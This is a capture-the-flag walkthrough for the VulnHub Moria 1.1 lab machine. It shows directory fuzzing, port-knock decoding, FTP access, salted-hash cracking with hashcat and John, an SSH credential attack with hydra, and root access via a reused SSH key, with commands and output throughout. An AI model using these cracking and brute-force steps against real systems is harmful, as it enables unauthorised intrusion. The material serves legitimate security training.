Recon
TCP/21 (FTP)
- Anonymous login disabled
1 2 3 4 5 6 7 8 9 10
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/scans] └─# ftp $ip Connected to 192.168.110.36. 220 Welcome Balrog! Name (192.168.110.36:root): anonymous 331 Please specify the password. Password: 530 Login incorrect. ftp: Login failed ftp>
- Balrog could be the username
TCP/80 (HTTP)
FFUF - common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(root💀kali)-[~/vulnHub/moria-1.1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi,.log' -fc 403
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.36/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php .cgi .log
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 403
________________________________________________
[Status: 200, Size: 85, Words: 5, Lines: 8]
index.php [Status: 200, Size: 85, Words: 5, Lines: 8]
index.php [Status: 200, Size: 85, Words: 5, Lines: 8]
w [Status: 301, Size: 232, Words: 14, Lines: 8]
:: Progress: [27690/27690] :: Job [1/1] :: 4932 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
w
Initial Foothold
TCP/80 (HTTP) - Nothing Found
- Further enumerate
w/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
┌──(root💀kali)-[~/vulnHub/moria-1.1] └─# ffuf -u http://$ip/w/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi,.log' -fc 403 -recursion -of html -o ffuf.html /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.110.36/w/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Extensions : .html .txt .php .cgi .log :: Output file : ffuf.html :: File format : html :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response status: 403 ________________________________________________ http://192.168.110.36/w/h/i/s/p/e/r/FUZZ
- Proceed to
http://192.168.110.36/w/h/i/s/p/e/r/
- Contents of
the_abyss/index.php
changes everytime we visit it - Directory enumerate
the_abyss/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
┌──(root💀kali)-[~/vulnHub/moria-1.1] └─# ffuf -u http://192.168.110.36/w/h/i/s/p/e/r/the_abyss/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.php,.txt,' -fc 403 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.110.36/w/h/i/s/p/e/r/the_abyss/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Extensions : .html .php .txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response status: 403 ________________________________________________ index.php [Status: 200, Size: 21, Words: 4, Lines: 2] random.txt [Status: 200, Size: 407, Words: 54, Lines: 14] :: Progress: [23075/23075] :: Job [1/1] :: 2929 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
random.txt
- The content on
the_abyss
is randomized fromrandom.txt
- Port Knocking?
Wireshark - Suspicious Network Traffic
- Unsure of what to do, started wireshark to observe the network traffic between Kali and the Moria 1.1 machine.
- SYN Packet coming from Moria 1.1 to Kali
- 77, 101, 108, 108, 111, 110, 54, 57
Port Knocking - Failed
- Port knock
1 2 3 4 5 6 7 8 9 10
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/scans] └─# knock -v $ip 77 101 108 108 111 110 54 57 hitting tcp 192.168.110.36:77 hitting tcp 192.168.110.36:101 hitting tcp 192.168.110.36:108 hitting tcp 192.168.110.36:108 hitting tcp 192.168.110.36:111 hitting tcp 192.168.110.36:110 hitting tcp 192.168.110.36:54 hitting tcp 192.168.110.36:57
- Check for newly opened ports
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/scans] └─# nmap $ip -p- Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-02 18:14 +08 Nmap scan report for 192.168.110.36 Host is up (0.00023s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:BA:33:82 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds
- No new ports
- Instead, convert to ASCII
- Mellon69
TCP/21 (FTP) - Found web content
- Access FTP w/ Balrog:Mellon69
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/loot] └─# ftp $ip Connected to 192.168.110.36. 220 Welcome Balrog! Name (192.168.110.36:root): Balrog 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> pwd Remote directory: /prison ftp> dir 229 Entering Extended Passive Mode (|||24812|). 150 Here comes the directory listing. 226 Directory send OK. ftp> cd .. 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||44933|). 150 Here comes the directory listing. lrwxrwxrwx 1 0 0 7 Mar 11 2017 bin -> usr/bin dr-xr-xr-x 4 0 0 4096 Mar 11 2017 boot drwxr-xr-x 19 0 0 2960 Feb 28 16:30 dev drwxr-xr-x 97 0 0 8192 Feb 28 16:30 etc drwxr-x--- 4 0 1003 32 Mar 14 2017 home lrwxrwxrwx 1 0 0 7 Mar 11 2017 lib -> usr/lib lrwxrwxrwx 1 0 0 9 Mar 11 2017 lib64 -> usr/lib64 drwxr-xr-x 2 0 0 6 Nov 05 2016 media drwxr-xr-x 2 0 0 6 Nov 05 2016 mnt drwxr-xr-x 2 0 0 6 Nov 05 2016 opt drwxr-x--- 2 0 1001 27 Mar 14 2017 prison dr-xr-xr-x 115 0 0 0 Feb 28 08:30 proc dr-xr-x--- 8 0 0 276 Mar 13 2017 root drwxr-xr-x 26 0 0 760 Mar 01 05:01 run lrwxrwxrwx 1 0 0 8 Mar 11 2017 sbin -> usr/sbin drwxr-xr-x 2 0 0 6 Nov 05 2016 srv dr-xr-xr-x 13 0 0 0 Feb 28 16:30 sys drwxrwxrwt 8 0 0 170 Mar 01 06:18 tmp drwxr-xr-x 13 0 0 155 Mar 11 2017 usr drwxr-xr-x 21 0 0 4096 Feb 28 16:30 var 226 Directory send OK. ftp> pwd
- The entire filesystem is shared on FTP
- Proceed to
/var/www/html
, to look for additional web content1 2 3 4 5 6 7 8 9 10 11
ftp> cd /var/www/html 250 Directory successfully changed. ftp> dir 229 Entering Extended Passive Mode (|||14844|). 150 Here comes the directory listing. drwxr-xr-x 2 0 0 23 Mar 12 2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl -r-------- 1 48 48 85 Mar 12 2017 index.php -r-------- 1 48 48 161595 Mar 11 2017 moria.jpg drwxr-xr-x 3 0 0 15 Mar 12 2017 w 226 Directory send OK. ftp>
QlVraKW4fbIkXau9zkAPNGzviT3UKntl
TCP/80 (HTTP) - Obtain hashes
- Proceed to
QlVraKW4fbIkXau9zkAPNGzviT3UKntl
1 2 3 4 5 6 7 8 9 10 11
Prisoner's name Passkey Balin c2d8960157fc8540f6d5d66594e165e0 Oin 727a279d913fba677c490102b135e51e Ori 8c3c3152a5c64ffb683d78efc3520114 Maeglin 6ba94d6322f53f30aca4f34960203703 Fundin c789ec9fae1cd07adfc02930a39486a1 Nain fec21f5c7dcf8e5e54537cfda92df5fe Dain 6a113db1fd25c5501ec3a5936d817c29 Thrain 7db5040c351237e8332bfbba757a1019 Telchar dd272382909a4f51163c77da6356cc6f
MD5(MD5(Password).Salt)
Crack Hash - Hashcat
- Extract usernames & hashes
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit] └─# cat creds.txt | awk '{print $2}' | sed 's/name//g' | awk 'NF' | tee hashes.txt c2d8960157fc8540f6d5d66594e165e0 727a279d913fba677c490102b135e51e 8c3c3152a5c64ffb683d78efc3520114 6ba94d6322f53f30aca4f34960203703 c789ec9fae1cd07adfc02930a39486a1 fec21f5c7dcf8e5e54537cfda92df5fe 6a113db1fd25c5501ec3a5936d817c29 7db5040c351237e8332bfbba757a1019 dd272382909a4f51163c77da6356cc6f ┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit] └─# cat creds.txt | awk '{print $1}' | sed 's/Prisoner.*\|Passkey//g' | awk 'NF' | tee usernames.txt Balin Oin Ori Maeglin Fundin Nain Dain Thrain Telchar
- Append salt to hash w/
:
delimiter1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit] └─# paste -d ":" hashes.txt salt | tee salted_hash_hashcat c2d8960157fc8540f6d5d66594e165e0:6MAp84 727a279d913fba677c490102b135e51e:bQkChe 8c3c3152a5c64ffb683d78efc3520114:HnqeN4 6ba94d6322f53f30aca4f34960203703:e5ad5s c789ec9fae1cd07adfc02930a39486a1:g9Wxv7 fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP 6a113db1fd25c5501ec3a5936d817c29:cC5nTr 7db5040c351237e8332bfbba757a1019:h8spZR dd272382909a4f51163c77da6356cc6f:tb9AWe
- Research what hashcat mode to use to crack this hash
vBulletin: 2611
- Crack hash
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit] └─# hashcat -a 0 -m 2611 salted_hash /usr/share/wordlists/rockyou.txt --show | cut -d ":" -f3 | tee passwords.txt flower rainbow spanky fuckoff hunter2 warrior abcdef darkness magic
Crack Hash - John
- View formats
dynamic_6: md5(md5($p).$s)
- Append salt to hash w/
$
delimiter1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit] └─# paste -d '$' hashes.txt salt | tee salted_hash_john c2d8960157fc8540f6d5d66594e165e0$6MAp84 727a279d913fba677c490102b135e51e$bQkChe 8c3c3152a5c64ffb683d78efc3520114$HnqeN4 6ba94d6322f53f30aca4f34960203703$e5ad5s c789ec9fae1cd07adfc02930a39486a1$g9Wxv7 fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP 6a113db1fd25c5501ec3a5936d817c29$cC5nTr 7db5040c351237e8332bfbba757a1019$h8spZR dd272382909a4f51163c77da6356cc6f$tb9AWe
- Crack hash
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit] └─# john --format=dynamic_6 salted_hash_john Using default input encoding: UTF-8 Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=2 Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst flower (?) warrior (?) spanky (?) rainbow (?) abcdef (?) fuckoff (?) darkness (?) magic (?) hunter2 (?) 9g 0:00:00:00 DONE 2/3 (2022-03-03 18:36) 450.0g/s 1512Kp/s 2856Kc/s 2856KC/s PHOENIX..kids2 Use the "--show --format=dynamic_6" options to display all of the cracked passwords reliably Session completed.
TCP/22 (SSH)
- Create wordlist in username:password format for hydra
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit] └─# paste -d ":" usernames.txt passwords.txt | tee hydra_creds.txt Balin:flower Oin:rainbow Ori:spanky Maeglin:fuckoff Fundin:hunter2 Nain:warrior Dain:abcdef Thrain:darkness Telchar:magic
- Bruteforce SSH
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit] └─# hydra -C hydra_creds.txt ssh://$ip Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-02 20:26:04 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries, ~1 try per task [DATA] attacking ssh://192.168.110.36:22/ [22][ssh] host: 192.168.110.36 login: Ori password: spanky 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-02 20:26:07
- Ori:spanky
- SSH w/ Ori:spanky
Privilege Escalation
Root - Via Creds Found (SSH Key)
- Linpeas
- Ori SSH’ed into localhost
The known_hosts File is a client file containing all remotely connected known hosts
- Ori SSH’ed into localhost
- SSH into localhost w/ private key
- Root Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
[root@Moria ~]# cat flag.txt “All that is gold does not glitter, Not all those who wander are lost; The old that is strong does not wither, Deep roots are not reached by the frost. From the ashes a fire shall be woken, A light from the shadows shall spring; Renewed shall be blade that was broken, The crownless again shall be king.” All That is Gold Does Not Glitter by J. R. R. Tolkien I hope you suff.. enjoyed this VM. It wasn't so hard, was it? -Abatchy [root@Moria ~]#
- View Root’s
authorized_keys
1 2 3
[root@Moria .ssh]# cat authorized_keys from="127.0.0.1" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison [root@Moria .ssh]#
- Contains Ori’s public key
Comments powered by Disqus.